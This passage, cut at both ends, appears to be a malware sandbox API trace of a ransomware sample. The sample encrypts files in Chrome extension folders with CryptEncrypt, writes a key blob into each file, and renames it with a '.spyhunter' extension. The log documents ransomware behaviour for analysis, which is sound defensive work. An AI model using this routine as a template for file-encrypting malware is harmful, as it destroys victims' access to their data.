"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0135.105] GetProcessHeap () returned 0x2c0000 [0135.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.105] GetProcessHeap () returned 0x2c0000 [0135.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.105] GetProcessHeap () returned 0x2c0000 [0135.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f730 | out: hHeap=0x2c0000) returned 1 [0135.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf408 | out: pbBuffer=0x25cf408) returned 1 [0135.106] GetProcessHeap () returned 0x2c0000 [0135.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf400*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf400*=0x30) returned 1 [0135.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0135.107] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.107] GetProcessHeap () returned 0x2c0000 [0135.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.107] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3c4*=0x116, lpOverlapped=0x0) returned 1 [0135.108] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.108] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x25cf3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3c4*=0x116, lpOverlapped=0x0) returned 1 [0135.108] GetProcessHeap () returned 0x2c0000 [0135.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.109] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.109] WriteFile (in: hFile=0xec, lpBuffer=0x25cf404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf404*, lpNumberOfBytesWritten=0x25cf3c4*=0x4, lpOverlapped=0x0) returned 1 [0135.109] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3c4*=0x30, lpOverlapped=0x0) returned 1 [0135.109] CloseHandle (hObject=0xec) returned 1 [0135.109] GetProcessHeap () returned 0x2c0000 [0135.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.109] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.spyhunter") returned 166 [0135.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0135.110] GetProcessHeap () returned 0x2c0000 [0135.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.110] GetProcessHeap () returned 0x2c0000 [0135.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.110] GetProcessHeap () returned 0x2c0000 [0135.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f298 | out: hHeap=0x2c0000) returned 1 [0135.110] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf400 | out: pbBuffer=0x25cf400) returned 1 [0135.110] GetProcessHeap () returned 0x2c0000 [0135.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.111] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3f8*=0x30) returned 1 [0135.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0135.111] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0135.111] GetProcessHeap () returned 0x2c0000 [0135.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.111] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3bc*=0x3ec, lpOverlapped=0x0) returned 1 [0135.131] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffc14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.131] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3ec, lpNumberOfBytesWritten=0x25cf3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3bc*=0x3ec, lpOverlapped=0x0) returned 1 [0135.132] GetProcessHeap () returned 0x2c0000 [0135.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.132] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.132] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf3fc*, lpNumberOfBytesWritten=0x25cf3bc*=0x4, lpOverlapped=0x0) returned 1 [0135.132] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3bc*=0x30, lpOverlapped=0x0) returned 1 [0135.132] CloseHandle (hObject=0xec) returned 1 [0135.132] GetProcessHeap () returned 0x2c0000 [0135.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.132] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.spyhunter") returned 154 [0135.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.spyhunter")) returned 1 [0135.133] GetProcessHeap () returned 0x2c0000 [0135.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.133] GetProcessHeap () returned 0x2c0000 [0135.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.134] GetProcessHeap () returned 0x2c0000 [0135.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc71a0 | out: hHeap=0x2c0000) returned 1 [0135.423] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3f0 | out: pbBuffer=0x25cf3f0) returned 1 [0135.423] GetProcessHeap () returned 0x2c0000 [0135.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.423] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3e8*=0x30) returned 1 [0135.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.424] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0135.424] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.424] GetProcessHeap () returned 0x2c0000 [0135.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.424] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3ac*=0xb3, lpOverlapped=0x0) returned 1 [0135.425] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.425] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3ac*=0xb3, lpOverlapped=0x0) returned 1 [0135.425] GetProcessHeap () returned 0x2c0000 [0135.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.425] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.425] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf3ec*, lpNumberOfBytesWritten=0x25cf3ac*=0x4, lpOverlapped=0x0) returned 1 [0135.426] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3ac*=0x30, lpOverlapped=0x0) returned 1 [0135.426] CloseHandle (hObject=0xec) returned 1 [0135.426] GetProcessHeap () returned 0x2c0000 [0135.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.426] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.spyhunter") returned 167 [0135.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0135.427] GetProcessHeap () returned 0x2c0000 [0135.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.427] GetProcessHeap () returned 0x2c0000 [0135.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.427] GetProcessHeap () returned 0x2c0000 [0135.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82808 | out: hHeap=0x2c0000) returned 1 [0135.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3e8 | out: pbBuffer=0x25cf3e8) returned 1 [0135.428] GetProcessHeap () returned 0x2c0000 [0135.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.429] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3e0*=0x30) returned 1 [0135.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0135.429] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.429] GetProcessHeap () returned 0x2c0000 [0135.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.429] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3a4*=0xb3, lpOverlapped=0x0) returned 1 [0135.430] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.430] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3a4*=0xb3, lpOverlapped=0x0) returned 1 [0135.430] GetProcessHeap () returned 0x2c0000 [0135.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.431] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.431] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf3e4*, lpNumberOfBytesWritten=0x25cf3a4*=0x4, lpOverlapped=0x0) returned 1 [0135.431] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3a4*=0x30, lpOverlapped=0x0) returned 1 [0135.431] CloseHandle (hObject=0xec) returned 1 [0135.431] GetProcessHeap () returned 0x2c0000 [0135.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.431] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.spyhunter") returned 167 [0135.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.spyhunter")) returned 1 [0135.432] GetProcessHeap () returned 0x2c0000 [0135.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.432] GetProcessHeap () returned 0x2c0000 [0135.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.432] GetProcessHeap () returned 0x2c0000 [0135.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82680 | out: hHeap=0x2c0000) returned 1 [0135.433] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3e0 | out: pbBuffer=0x25cf3e0) returned 1 [0135.433] GetProcessHeap () returned 0x2c0000 [0135.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf3d8*=0x30) returned 1 [0135.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0135.434] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.434] GetProcessHeap () returned 0x2c0000 [0135.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.434] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf39c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf39c*=0xb3, lpOverlapped=0x0) returned 1 [0135.435] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.435] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf39c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf39c*=0xb3, lpOverlapped=0x0) returned 1 [0135.435] GetProcessHeap () returned 0x2c0000 [0135.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.436] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.436] WriteFile (in: hFile=0xec, lpBuffer=0x25cf3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf39c, lpOverlapped=0x0 | out: lpBuffer=0x25cf3dc*, lpNumberOfBytesWritten=0x25cf39c*=0x4, lpOverlapped=0x0) returned 1 [0135.436] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf39c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf39c*=0x30, lpOverlapped=0x0) returned 1 [0135.436] CloseHandle (hObject=0xec) returned 1 [0135.436] GetProcessHeap () returned 0x2c0000 [0135.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.437] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.spyhunter") returned 167 [0135.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0135.438] GetProcessHeap () returned 0x2c0000 [0135.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.439] GetProcessHeap () returned 0x2c0000 [0135.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.439] GetProcessHeap () returned 0x2c0000 [0135.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f824f8 | out: hHeap=0x2c0000) returned 1 [0135.440] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf3d8 | out: pbBuffer=0x25cf3d8) returned 1 [0135.440] GetProcessHeap () returned 0x2c0000 [0135.440] RtlAllocateHeap 